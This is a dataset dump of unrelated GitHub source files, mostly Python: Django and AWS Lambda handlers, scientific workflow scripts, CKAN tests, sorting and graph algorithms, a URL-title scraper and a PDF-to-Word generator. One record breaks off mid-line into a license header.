--\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Imaging/Core/Testing/Python/TestAccumulate.py","file_name":"TestAccumulate.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"34382080884","text":"from django.utils import timezone\nfrom django.shortcuts import render\n\n\ndef home(request):\n ctx = {}\n template = \"home/index.html\"\n ctx = {\n 'next_meetup': {\n 'date': timezone.datetime(2018, 9, 5, 18, 30)\n }\n }\n return render(request, template, ctx)\n","repo_name":"SLCPython/slcpy.com","sub_path":"slcpy/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14995124458","text":"# check if both parties have sent their \n\nimport json\nfrom pprint import pprint\nimport boto3\nfrom datetime import datetime\nimport uuid\n\ndef lambda_handler(event, context):\n \n client = boto3.resource(\"dynamodb\")\n table = client.Table(\"RequestHistory\")\n id = event['SenderID'] + '_' + str(uuid.uuid4())[:8]\n date = datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n \n response = table.put_item(\n Item = {\n 'SenderID' : event['SenderID'],\n 'Timestamp' : date,\n 'Sender' : event[\"Sender\"],\n 'Reciever' : event[\"Reciever\"],\n 'SenderBank' : event[\"SenderBank\"],\n 'RecieverBank' : event[\"RecieverBank\"],\n 'Description' : event[\"Description\"],\n 'Amount' : event[\"Amount\"],\n 'RequestID' : id,\n 'Fulfilled' : False\n }) \n \n \n return response\n","repo_name":"Xuzii/Venmo_of_Indo","sub_path":"backend/lamdba_function_requestTransaction.py","file_name":"lamdba_function_requestTransaction.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6713894895","text":"# pattern printing\n# Input = Integer n\n# Boolean = True or False\n#\n# True n=4\n# *\n# **\n# ***\n# ****\n#\n# False\n# ****\n# ***\n# **\n# *\n\ninp1=int(input(\"Enter the number of rows : \"))\ninp2=int(input(\"Enter the boolean value : \"))\nif inp2==True:\n i=0;\n while i. #\n# #\n###############################################################################\n\n__author__ = \"Josh Daly\"\n__copyright__ = \"Copyright 2015\"\n__credits__ = [\"Josh Daly\"]\n__license__ = \"GPL3\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"Josh Daly\"\n__email__ = \"joshua.daly@uqconnect.edu.au\"\n__status__ = \"Development\"\n\n###############################################################################\n###############################################################################\n###############################################################################\n###############################################################################\n###############################################################################\n\nclass GreenGenesTaxonomy(object):\n def __init__(self, gg_tax_file):\n self._phylum = {}\n self._class = {}\n self._order = {}\n self._family = {}\n self.wrapper(gg_tax_file)\n \n def wrapper(self, gg_tax_file):\n self.grabGGTaxData(gg_tax_file)\n \n def grabGGTaxData(self, gg_tax_file):\n with open(gg_tax_file) as fh:\n for l in fh:\n whitespace = l.rstrip().split()\n gg_id = whitespace[0]\n gg_tax = whitespace[1:]\n try:\n __genus, __family, __order, __class, __phylum = self.getTaxonRanks(gg_tax)\n self.addTaxData(__genus, __family, __order, __class, __phylum)\n except IndexError:\n pass\n \n def getTaxonRanks(self, gg_tax):\n __genus = ''\n __family = ''\n __order = ''\n __class = ''\n __phylum = ''\n \n for taxon_rank in gg_tax:\n if 'p__' in taxon_rank:\n __phylum = self.removeSemiColon(taxon_rank).lower()\n elif 'c__' in taxon_rank:\n __class = self.removeSemiColon(taxon_rank).lower()\n elif 'o__' in taxon_rank:\n __order = self.removeSemiColon(taxon_rank).lower()\n elif 'f__' in taxon_rank:\n __family = self.removeSemiColon(taxon_rank).lower()\n elif 'g__' in taxon_rank:\n __genus = self.removeSemiColon(taxon_rank).lower()\n \n return __genus, __family, __order, __class, __phylum\n\n def removeSemiColon(self, taxon_rank):\n if ';' in taxon_rank:\n return taxon_rank[3:-1]\n else:\n return taxon_rank[3:]\n\n def addTaxData(self, __genus, __family, __order, __class, __phylum):\n if len(__genus) > 1:\n self._phylum[__genus] = __phylum\n self._class[__genus] = __class\n self._order[__genus] = __order\n self._family[__genus] = __family\n \n###############################################################################\n###############################################################################\n###############################################################################\n###############################################################################\n","repo_name":"JoshDaly/TrackMscripts","sub_path":"grab_gg_taxonomy.py","file_name":"grab_gg_taxonomy.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38576261728","text":"\n__doc__=\"HP Blade Chassis Zen Pack\"\n\nimport Globals\nimport os\n\nfrom Products.CMFCore.DirectoryView import registerDirectory\nfrom Products.ZenModel.DeviceClass import manage_addDeviceClass\n\nskinsDir = os.path.join(os.path.dirname(__file__), 'skins')\nif os.path.isdir(skinsDir):\n registerDirectory(skinsDir, globals())\n\nfrom Products.ZenModel.ZenPack import ZenPackBase\n\nimport ZenPacks.community.HPBladeChassis\ndef initialize(registrar):\n registrar.registerClass(\n BladeServer.BladeServer,\n permission='Add DMD Objects',\n )\n\n\nclass ZenPack(ZenPackBase):\n \"\"\" HPBladeChassis loader\n \"\"\"\n\n def install(self, app):\n if not hasattr(app.zport.dmd.Devices, 'BladeChassis'):\n manage_addDeviceClass(app.zport.dmd.Devices, 'BladeChassis')\n dc = app.zport.dmd.Devices.getOrganizer('BladeChassis')\n dc.description = ''\n ZenPackBase.install(self, app)\n\n def upgrade(self, app):\n if not hasattr(app.zport.dmd.Devices, 'BladeChassis'):\n manage_addDeviceClass(app.zport.dmd.Devices, 'BladeChassis')\n dc = app.zport.dmd.Devices.getOrganizer('BladeChassis')\n dc.description = ''\n ZenPackBase.upgrade(self, app)\n\n def remove(self, app, leaveObjects=False):\n ZenPackBase.remove(self, app, leaveObjects)\n\n","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.community.HPBladeChassis/ZenPacks/community/HPBladeChassis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"33462805575","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom transformers import BertTokenizer, BertForMaskedLM\nimport torch\n\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nmodel = BertForMaskedLM.from_pretrained('bert-base-uncased')\n\n#input_text = \"I have [MASK] apples and [MASK] oranges and [MASK] bananas.\"\ninput_text = \"She is a [MASK] girl and she want to [MASK] with me on [MASK] and [MASK] me very much.\"\nnum_mask = input_text.count(\"[MASK]\")\n\nprint()\n\n# 循环预测每一个掩盖的词\nfor i in range(num_mask):\n input = tokenizer.encode(input_text, return_tensors=\"pt\")\n mask_index = torch.where(input == tokenizer.mask_token_id)[1]\n\n output = model(input, return_dict=True)\n logits = output.logits\n\n mask_word = logits[0, mask_index, :]\n for j in range(mask_word.shape[0]):\n print('predicted_word, No.', j, 'MASK :')\n top_5_words = torch.topk(mask_word, 10, dim=1).indices[j].tolist()\n for token in top_5_words:\n predicted_word = tokenizer.decode([token])\n print(predicted_word, end=' ')\n print()\n\n top_5_words = torch.topk(mask_word, 10, dim=1).indices[0].tolist()\n all_predicted_text = input_text\n for token in top_5_words:\n predicted_word = tokenizer.decode([token])\n all_predicted_text = all_predicted_text.replace(\"[MASK]\", predicted_word, 1)\n print(f\"预测的句子: {all_predicted_text}\")\n all_predicted_text = input_text # restore the input_text for the next prediction\n\n # 选取概率最高的词填入句子中\n predicted_word = tokenizer.decode([top_5_words[0]])\n input_text = input_text.replace(\"[MASK]\", predicted_word, 1)\n\n print('-----')\n\n","repo_name":"zliu1022/py-ex","sub_path":"transformer/multi_mf_atte.py","file_name":"multi_mf_atte.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42331168171","text":"# encoding: utf-8\n\nimport pytest\n\nfrom ckan import model\nfrom ckan.tests import factories\n\n\n@pytest.mark.usefixtures(u\"clean_db\", u\"with_request_context\")\nclass TestPackage(object):\n def test_create(self):\n # Demonstrate creating a package.\n #\n # In practice this is done by a combination of:\n # * ckan.logic.action.create:package_create\n # * ckan.lib.dictization.model_save.py:package_dict_save\n # etc\n\n pkg = model.Package(name=u\"test-package\")\n pkg.notes = u\"Some notes\"\n pkg.author = u\"bob\"\n pkg.license_id = u\"odc-by\"\n\n model.Session.add(pkg)\n model.Session.commit()\n model.Session.remove()\n\n pkg = model.Package.by_name(u\"test-package\")\n assert pkg.notes == u\"Some notes\"\n assert pkg.author == u\"bob\"\n assert pkg.license_id == u\"odc-by\"\n assert pkg.license.title == u\"Open Data Commons Attribution License\"\n\n def test_update(self):\n dataset = factories.Dataset()\n pkg = model.Package.by_name(dataset[u\"name\"])\n\n pkg.author = u\"bob\"\n model.Session.commit()\n model.Session.remove()\n\n pkg = model.Package.by_name(dataset[u\"name\"])\n assert pkg.author == u\"bob\"\n\n def test_delete(self):\n group = factories.Group()\n dataset = factories.Dataset(\n groups=[{u\"id\": group[u\"id\"]}],\n tags=[{u\"name\": u\"science\"}],\n extras=[{u\"key\": u\"subject\", u\"value\": u\"science\"}],\n )\n pkg = model.Package.by_name(dataset[u\"name\"])\n\n pkg.delete()\n model.Session.commit()\n model.Session.remove()\n\n pkg = model.Package.by_name(dataset[u\"name\"])\n assert pkg.state == u\"deleted\"\n # it is removed from the group\n group = model.Group.get(group[\"id\"])\n assert [p.name for p in group.packages()] == []\n # other related objects don't change\n package_extra = model.Session.query(model.PackageExtra).all()[0]\n assert package_extra.state == u\"active\"\n package_tag = model.Session.query(model.PackageTag).all()[0]\n assert package_tag.state == u\"active\"\n tag = model.Session.query(model.Tag).all()[0]\n assert [p.name for p in tag.packages] == [dataset[u\"name\"]]\n\n def test_purge(self):\n org = factories.Organization()\n group = factories.Group()\n dataset = factories.Dataset(\n resources=[\n {\n u\"url\": u\"http://example.com/image.png\",\n u\"format\": u\"png\",\n u\"name\": u\"Image 1\",\n }\n ],\n tags=[{u\"name\": u\"science\"}],\n extras=[{u\"key\": u\"subject\", u\"value\": u\"science\"}],\n groups=[{u\"id\": group[u\"id\"]}],\n owner_org=org[u\"id\"],\n )\n pkg = model.Package.by_name(dataset[u\"name\"])\n\n pkg.purge()\n model.Session.commit()\n model.Session.remove()\n\n assert not model.Session.query(model.Package).all()\n # the purge cascades to some objects\n assert not model.Session.query(model.PackageExtra).all()\n assert not model.Session.query(model.PackageTag).all()\n assert not model.Session.query(model.Resource).all()\n # org remains, just not attached to the package\n org = model.Group.get(org[u\"id\"])\n assert org.packages() == []\n # tag object remains, just not attached to the package\n tag = model.Session.query(model.Tag).all()[0]\n assert tag.packages == []\n # group object remains, just not attached to the package\n group = model.Group.get(group[u\"id\"])\n assert group.packages() == []\n","repo_name":"OCHA-DAP/hdx-ckan","sub_path":"ckan/tests/model/test_package.py","file_name":"test_package.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"} +{"seq_id":"21914597920","text":"#!/usr/bin/env python\nr\"\"\"\nRelaxation with different k-meshes\n==================================\n\nIn this example, we employ the relaxation algorithms implemented in Abinit (``ionmov`` and ``optcell``)\nto find the equilibrium configuration of GaN (atomic positions and lattice vectors).\nThe relaxation is performed with different k-meshes to monitor the convergence of the results.\nYou will observe a change of the equilibrium parameters with respect to the k-point mesh.\n\nNote the we are using pseudopotentials generated with the GGA which tends to\noverestimate the lattice parameters and ecut is way too low.\nIf you replace GGA with LDA, you will observe that LDA tends to underestimate the parameters.\n\"\"\"\n\nimport sys\nimport os\n\nimport abipy.abilab as abilab\nimport abipy.flowtk as flowtk\nimport abipy.data as abidata\n\n\ndef build_flow(options):\n \"\"\"\n Build and return a flow performing structural relaxations with different k-point samplings.\n \"\"\"\n # Set working directory (default is the name of the script with '.py' removed and \"run_\" replaced by \"flow_\")\n if not options.workdir:\n options.workdir = os.path.basename(sys.argv[0]).replace(\".py\", \"\").replace(\"run_\", \"flow_\")\n\n # List of k-meshes.\n ngkpt_list = [\n [3, 3, 2],\n [6, 6, 4],\n [8, 8, 6],\n ]\n\n structure = abilab.Structure.from_file(abidata.cif_file(\"gan2.cif\"))\n pseudos = abidata.pseudos(\"Ga.oncvpsp\", \"N.oncvpsp\")\n\n # Build multidataset.\n multi = abilab.MultiDataset(structure=structure, pseudos=pseudos, ndtset=len(ngkpt_list))\n\n # Set global variables for structural relaxation. Note dilatmx and ecutsm\n # Ecut should depend on pseudos.\n multi.set_vars(\n ecut=15, # Too low\n optcell=2,\n ionmov=3,\n tolrff=5.0e-2,\n tolmxf=5.0e-5,\n ntime=50,\n dilatmx=1.05, # Important!\n ecutsm=0.5, # Important!\n )\n\n # Here we set the k-meshes (Gamma-centered for simplicity)\n for i, ngkpt in enumerate(ngkpt_list):\n multi[i].set_kmesh(ngkpt=ngkpt, shiftk=[0, 0, 0])\n\n # As the calculations are independent, we can use Flow.from_inputs\n # and call split_datasets to create len(ngkpt_list) inputs.\n # Note that it's a good idea to specify the task_class so that AbiPy knows how to restart the calculation.\n return flowtk.Flow.from_inputs(options.workdir, inputs=multi.split_datasets(),\n task_class=flowtk.RelaxTask)\n\n\n# This block generates the thumbnails in the AbiPy gallery.\n# You can safely REMOVE this part if you are using this script for production runs.\nif os.getenv(\"READTHEDOCS\", False):\n __name__ = None\n import tempfile\n options = flowtk.build_flow_main_parser().parse_args([\"-w\", tempfile.mkdtemp()])\n build_flow(options).graphviz_imshow()\n\n\n@flowtk.flow_main\ndef main(options):\n \"\"\"\n This is our main function that will be invoked by the script.\n flow_main is a decorator implementing the command line interface.\n Command line args are stored in `options`.\n \"\"\"\n return build_flow(options)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n\n############################################################################\n# Run the script with:\n#\n# run_relax_vs_kpts.py -s\n#\n# then use:\n#\n# abirun.py flow_relax_vs_kpts hist -p\n#\n# to print (and plot) the relaxed parameters at the end of the run.\n#\n# .. code-block:: bash\n#\n# Table with final structures, pressures in GPa and force stats in eV/Ang:\n#\n# formula natom angle0 angle1 angle2 a b c volume \\\n# w0_t0 Ga2 N2 4 90.0 90.0 120.0 3.224 3.224 5.343 48.080\n# w0_t1 Ga2 N2 4 90.0 90.0 120.0 3.249 3.249 5.321 48.635\n# w0_t2 Ga2 N2 4 90.0 90.0 120.0 3.254 3.254 5.335 48.909\n#\n# abispg_num num_steps final_energy final_pressure task_class \\\n# w0_t0 None 9 -755.344 -1.088e-04 RelaxTask\n# w0_t1 None 9 -755.632 -5.088e-03 RelaxTask\n# w0_t2 None 11 -755.645 -4.314e-03 RelaxTask\n#\n# ncfile status\n# w0_t0 flow_relax_vs_kpts/w0/t0/outdata/out_HIST.nc Completed\n# w0_t1 flow_relax_vs_kpts/w0/t1/outdata/out_HIST.nc Completed\n# w0_t2 flow_relax_vs_kpts/w0/t2/outdata/out_HIST.nc Completed\n#\n# The experimental results are:\n#\n# * Volume of the unit cell of GaN: 45.73 A^3\n# * Lattice parameters of GaN: a = 3.190 A, c = 5.189 A\n# * Vertical distance between Ga and N : about 0.377 * c [ Schulz & Thiemann, 1977]\n#\n# .. image:: https://github.com/abinit/abipy_assets/blob/master/run_relax_vs_kpts.png?raw=true\n# :alt: Evolution of the volume during the relaxation algorithm.\n","repo_name":"abinit/abipy","sub_path":"abipy/examples/flows/run_relax_vs_kpts.py","file_name":"run_relax_vs_kpts.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"72"} +{"seq_id":"24542897476","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nimport csv\nimport pandas as pd\n\n# Opening the file and reading it\nwith open(\"dummy.csv\") as csvfile:\n csv_string = csvfile.read()\n # Sample URL tests\n # csv_string += \"https://aws.amazon.com/premiumsupport/knowledge-center/athena-hive-cursor-error/\"\n # csv_string += \"\\n https://aws.github.io/aws-eks-best-practices/\"\n \n# Where we'll store the URLs \ncsv_set = set()\n\nhtml_docs = []\ntitles = []\n\n\n# Main function to extract all URL's that contain the keyword \"aws\"\ndef find(string):\n regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n urls = re.findall(regex, string)\n for url in urls:\n # if url[0].startswith(\"https://aws.amazon.com/premiumsupport/knowledge-center/\"):\n if \"aws\" in url[0]:\n csv_set.add(url[0])\n\n# Grabbing all non-empty strings\ndef get_nonempty(list_of_strings):\n for s in list_of_strings:\n if s:\n return s\n \n\n# Invocation of main func \nfind(csv_string)\n\n\n# Getting the HTML docs for each URL\nfor url in csv_set:\n r = requests.get(url)\n html_docs.append(r.text)\n\n\n# Web Parsing each url\nfor doc in html_docs:\n soup = BeautifulSoup(doc, \"html.parser\")\n list_of_strings = soup.get_text().splitlines()\n # Grabbing the title\n lst = get_nonempty(list_of_strings)\n # If the title of the webpage has quotes...\n if '\"' in lst:\n # Replace it with an empty string \n lst = lst.replace('\"', '')\n \n titles.append(lst)\n\n# Uncomment to see list of titles \n# print(titles)\n\n# Turning the set back into a list\nurls = list(csv_set)\n\n# Matching the urls to titles\ntitle_urls = list(zip(urls, titles))\n\n# Uncomment to view list mapping titles to URL's\n# print(title_urls)\n\n# Writing our data to a new csv file\nwith open(\"out_csv.csv\", \"w\", newline=\"\") as new_csvfile:\n fieldnames = [\"Hyperlinks\"]\n writer = csv.DictWriter(new_csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for item in title_urls:\n writer.writerow({\"Hyperlinks\": '=HYPERLINK(\"' + item[0] +'\",\"' + item[1]+'\")' })\n\n# Converting it to an xlsx without duplicates\n# df = pd.read_csv(\"out_csv.csv\", sep=\",\");\n# df.drop_duplicates(subset=None, inplace=True)\n# df.to_excel(\"final_output.xlsx\", index=False)\n","repo_name":"KrishayR/Hyperlinking-URLs-to-titles","sub_path":"hyperlink.py","file_name":"hyperlink.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10781371354","text":"\"\"\"\nTopological Sort\nSteps:\n Input ==> Vertices: Integer\n Edges : List[(from(int), to(int)] # EDGE LIST\n 1. Initialize the Graph\n - inDegree = {i: 0 for i in range(vertices)} # Count of incoming edges\n - graph = {i: [] for i in range(vertices)}\n\n 2. Build the Graph\n - Iterate over all the edges\n - Put the Child into it's Parent's List\n - Increment Child's inDegree\n\n 3. Find all the sources i.e., all the vertices with 0 in-degrees\n - Put all the sources in the bfsQueue\n\n 4. BFS Traversal\n - Pop the node\n - store the node value in sortedOrder\n - Get the node's children to decrement their inDegree\n - if the inDegree == 0 # It is a source now\n Add it the bfsQueue\n\n 5. Return the topological sort if there is no cycle\n if len(sortedOrder) != vertices\n\"\"\"\nfrom collections import deque\n\n\ndef topological_sort(vertices, edges):\n sortedOrder = []\n if vertices <= 0:\n return sortedOrder\n\n # a. Initialize the graph\n inDegree = {i: 0 for i in range(vertices)} # count of incoming edges\n graph = {i: [] for i in range(vertices)} # adjacency list graph\n\n # b. Build the graph\n for edge in edges:\n parent, child = edge[0], edge[1]\n graph[parent].append(child) # put the child into it's parent's list\n inDegree[child] += 1 # increment child's inDegree\n\n # c. Find all sources i.e., all vertices with 0 in-degrees\n sources = deque()\n for key in inDegree:\n if inDegree[key] == 0:\n sources.append(key)\n\n # d. For each source, add it to the sortedOrder and subtract one from all of its children's in-degrees\n # if a child's in-degree becomes zero, add it to the sources queue\n while sources:\n vertex = sources.popleft()\n sortedOrder.append(vertex)\n for child in graph[vertex]: # get the node's children to decrement their in-degrees\n inDegree[child] -= 1\n if inDegree[child] == 0:\n sources.append(child)\n\n # topological sort is not possible as the graph has a cycle\n return [] if len(sortedOrder) != vertices else sortedOrder\n\n\ndef main():\n print(\"Topological sort: \" +\n str(topological_sort(4, [[3, 2], [3, 0], [2, 0], [2, 1]])))\n print(\"Topological sort: \" +\n str(topological_sort(5, [[4, 2], [4, 3], [2, 0], [2, 1], [3, 1]])))\n print(\"Topological sort: \" +\n str(topological_sort(7, [[6, 4], [6, 2], [5, 3], [5, 4], [3, 0], [3, 1], [3, 2], [4, 1]])))\n\n\nmain()\n","repo_name":"sandeepyadav10011995/Data-Structures","sub_path":"IT Bodhi/Graphs/7. Topological Sort.py","file_name":"7. Topological Sort.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27631133152","text":"import socket\nfrom util import *\n\nsend_file_path='D:/code/Learning/Computer_Network/lab2/send_data.txt'\n\nserver_socket=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nserver_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\nserver_socket.bind(('127.0.0.1',6666))\n\nclient_addr=('127.0.0.1',6666)\nwhile True:\n message,clientAddress=server_socket.recvfrom(2048)\n if message.decode()=='begin':\n client_addr=clientAddress\n break\nGBN_send_file(server_socket,send_file_path,client_addr)\n\n_=input('send over press enter to exit')\nserver_socket.close()","repo_name":"hit-fushibo/HitLearningCode","sub_path":"Learning/Computer_Network/lab2/add2_server.py","file_name":"add2_server.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"35589105312","text":"import os\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom managers.pdf_manager import PdfManager\nfrom managers.word_manager import WordManager\nfrom managers.str_manager import StrManager\nfrom threading import Lock\nimport concurrent.futures\nfrom multiprocessing import freeze_support\n\n'''\nGenerate 34 VT files - 16 sec\n'''\n\n# Declaring a lock\nlock = Lock() ## is needed to lock MailMerge.write(), otherwise race condition.\npdf_manager = PdfManager()\nword_manager = WordManager()\n\ndef make_drawing_name(path_pdf: str):\n name_pdf = os.path.splitext(os.path.basename(path_pdf))[0]\n if name_pdf.count(\"-\") > 2:\n name_pdf = StrManager.change_last_dash_to_dot(name_pdf)\n return name_pdf + \".00\"\n\n#Define a function to clear the text\ndef clear_text():\n text.delete(1.0, END)\n\n# pdf_path example: C:/Users/SAMS/cw_technics_vt_automation/repo/CWT.MP21-28-162/Rasejumi ceham/MP21-28-162-03.pdf\ndef generate_vt(pdf_path: str):\n folder_destination = os.path.dirname(os.path.dirname(pdf_path))\n drawing = make_drawing_name(pdf_path) \n print(f\"Generating VT for {drawing}\")\n err_msg, my_pdf_data = pdf_manager.process_pdf(pdf_path) \n if err_msg is not None:\n #text.insert(1.0, f\"{drawing} {err_msg} \\n\") make this shit print from a thread\n print(f\"{drawing} {err_msg}\")\n else: \n lock.acquire()\n word_manager.create_word_from_template(\"repo\\VT-Template.docx\", folder_destination, my_pdf_data, drawing)\n lock.release()\n #text.insert(1.0, f\"{drawing} Word document is successfully generated\") \n\n#Define a function to open the pdf file\ndef open_pdf():\n files = filedialog.askopenfilenames(title=\"Select a PDF\", filetype=((\"PDF Files\",\"*.pdf\"),(\"All Files\",\"*.*\")))\n if not word_manager.template_exists():\n print(f\"\\nTemplate does not exist. Check \\\"{os.getcwd()}/{word_manager.PATH_VT_TEMPLATE}\\\"\")\n text.insert(END, f\"\\nTemplate does not exist. Check \\\"{os.getcwd()}/{word_manager.PATH_VT_TEMPLATE}\\\"\")\n return\n\n #file= filedialog.askopenfilenames(parent=win, title='Select a PDF')\n #if file:\n #for file in files:\n # generate_vt(file)\n if files:\n clear_text()\n text.insert(END, \"\\nBegin of the VT generation process\")\n text.update_idletasks()\n with concurrent.futures.ProcessPoolExecutor() as executor:\n executor.map(generate_vt, files)\n text.insert(END, \"\\nEnd of the VT generation process\") \n print(\"End.\")\n\ndef find_all_rasejumi_file_paths(path_folder: str) -> list:\n file_paths = []\n for root, dirs, files in os.walk(path_folder):\n if StrManager.is_rasejumi_in_string(root.split(os.path.sep)[-1]):\n file_paths.extend([os.path.join(root, f) for f in files])\n return file_paths\n\n# Walk through each nested folder including selected, check if the folder is \"rasejumi\", generate VTs for each \"rasejums\"\ndef open_folder():\n path_folder = filedialog.askdirectory()\n if not word_manager.template_exists():\n print(f\"\\nTemplate does not exist. Check \\\"{os.getcwd()}/{word_manager.PATH_VT_TEMPLATE}\\\"\")\n text.insert(END, f\"\\nTemplate does not exist. Check \\\"{os.getcwd()}/{word_manager.PATH_VT_TEMPLATE}\\\"\") \n return\n\n if path_folder:\n import time\n start = time.time()\n text.insert(END, \"\\nBegin of the VT generation process\")\n text.update_idletasks()\n\n file_paths = find_all_rasejumi_file_paths(path_folder)\n print(f\"{len(file_paths)} files found\")\n if file_paths:\n response = messagebox.askokcancel(\"askokcancel\", f\"{len(file_paths)} files found. Generate VTs?\")\n if response == 1:\n with concurrent.futures.ProcessPoolExecutor() as executor:\n executor.map(generate_vt, file_paths)\n \n else:\n text.insert(END, \"\\nCancelled\")\n\n else:\n text.insert(END, \"\\nCan't find \\\"Rasejumi\\\" folder\")\n text.insert(END, \"\\nEnd of the VT generation process\")\n end = time.time()\n print(f\"Success \\nTime elapsed: {round(end-start,4)} sec\")\n print(\"End.\")\n \n\n#Define function to Quit the window\ndef quit_app():\n win.destroy()\n \nif __name__ == '__main__':\n freeze_support() # For implemented multiprocessing. Without it many windows got opened and no error message printed.\n\n #Create an instance of tkinter frame\n win= Tk()\n #Set the Geometry\n win.geometry(\"750x450\")\n #Create a Text Box\n text= Text(win,width= 80,height=30)\n text.pack(pady=20)\n #Add a title\n win.title('VT Generator')\n #Create a Menu\n my_menu= Menu(win)\n win.config(menu=my_menu)\n #Add dropdown to the Menus\n file_menu=Menu(my_menu,tearoff=False)\n my_menu.add_cascade(label=\"File\",menu= file_menu)\n file_menu.add_command(label=\"Select folder\",command=open_folder)\n file_menu.add_command(label=\"Select PDF\",command=open_pdf)\n file_menu.add_command(label=\"Clear\",command=clear_text)\n file_menu.add_command(label=\"Quit\",command=quit_app)\n win.mainloop()","repo_name":"mixren/cw_technics_vt_automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17688223425","text":"def selection_sort(arr):\n for i in range(len(arr) - 1):\n smallest_elem_index = i\n for j in range(i, len(arr)):\n if arr[j] < arr[smallest_elem_index]:\n smallest_elem_index = j\n if smallest_elem_index != i:\n arr[i], arr[smallest_elem_index] = arr[smallest_elem_index], arr[i]\n return arr\n\n\ndef bubble_sort(arr, opt=1):\n for i in range(len(arr) - 1):\n swap_occurred = False\n for j in range(len(arr) - (i + 1)):\n if arr[j] > arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n swap_occurred = True\n if not swap_occurred:\n break\n return arr\n\n\n# def bubble_sort(arr, sorted_length=0):\n# unsorted_length = len(arr) - sorted_length\n# swap_occurred = False\n# for j in range(unsorted_length - 1):\n# if arr[j] > arr[j + 1]:\n# arr[j], arr[j + 1] = arr[j + 1], arr[j]\n# swap_occurred = True\n# if swap_occurred and unsorted_length:\n# bubble_sort(arr, sorted_length + 1)\n\n# return arr\n\n\n\"\"\"\nSTRETCH: implement the Counting Sort function below\n\nCounting sort is a sorting algorithm that works on a set of data where\nwe specifically know the maximum value that can exist in that set of\ndata. The idea behind this algorithm then is that we can create \"buckets\"\nfrom 0 up to the max value. This is most easily done by initializing an\narray of 0s whose length is the max value + 1 (why do we need this \"+ 1\"?).\n\nEach buckets[i] then is responsible for keeping track of how many times \nwe've seen `i` in the input set of data as we iterate through it.\nOnce we know exactly how many times each piece of data in the input set\nshowed up, we can construct a sorted set of the input data from the \nbuckets. \n\nWhat is the time and space complexity of the counting sort algorithm?\n\"\"\"\n\n\ndef counting_sort(arr, maximum=None):\n sortedArr = [0 for n in arr] # O(n)\n if len(arr):\n if not maximum:\n maximum = arr[0]\n for i in range(len(arr)): # O(n)\n if arr[i] < 0:\n return \"Error, negative numbers not allowed in Count Sort\"\n if arr[i] > maximum:\n maximum = arr[i]\n\n counterArr = [0 for i in range(maximum + 1)] # O(k) where k is the max in arr\n\n for num in arr: # O(n)\n counterArr[num] += 1\n for i in range(1, len(counterArr)): # O(k) where k is the max number in arr\n counterArr[i] = counterArr[i - 1] + counterArr[i]\n\n end = len(arr) - 1\n while end >= 0: # O(n)\n current = arr[end]\n index = counterArr[current] - 1\n sortedArr[index] = current\n end -= 1\n return sortedArr\n\n \"\"\"\n 1- The time complexity for this algorithm is O(n + k)\n 2- The space complexity is O(n + k) where k is the maximum number in the array\n \"\"\"\n","repo_name":"rbabaci1/CS-Module-Iterative-Sorting","sub_path":"src/iterative_sorting/iterative_sorting.py","file_name":"iterative_sorting.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41237389955","text":"# Archivo: memoized_decorator2.py\n# Autor: Arbarr20 y ayuda online\n# Fecha: 21/02/2023\n# Descripción: se implementa una cache para simular el uso del decorador @lru.cache, es este caso\n# se aplica a una función recursiva.\n\nfrom decimal import Decimal\n\n\nclass memoized(object):\n \"\"\"\n Implementa un decorador de memoización.\n\n Memoization (o memoización) es una técnica de optimización utilizada para acelerar el cálculo\n al almacenar en caché los resultados de las llamadas a una función costosa. Con memoization, si\n la función se llama de nuevo con los mismos argumentos, no es 